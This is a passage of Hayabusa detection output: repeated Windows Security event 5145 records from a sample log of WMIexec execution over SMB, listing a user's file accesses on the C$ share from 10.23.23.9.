0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Downloads\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Favorites\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Links\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Music\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Pictures\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Saved Games\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Searches\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Videos\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 | IP Addr: 10.23.23.9 | 
LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 | IP Addr: 10.23.23.9 
| LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 | IP Addr: 10.23.23.9 | 
LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 | IP Addr: 10.23.23.9 
| LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 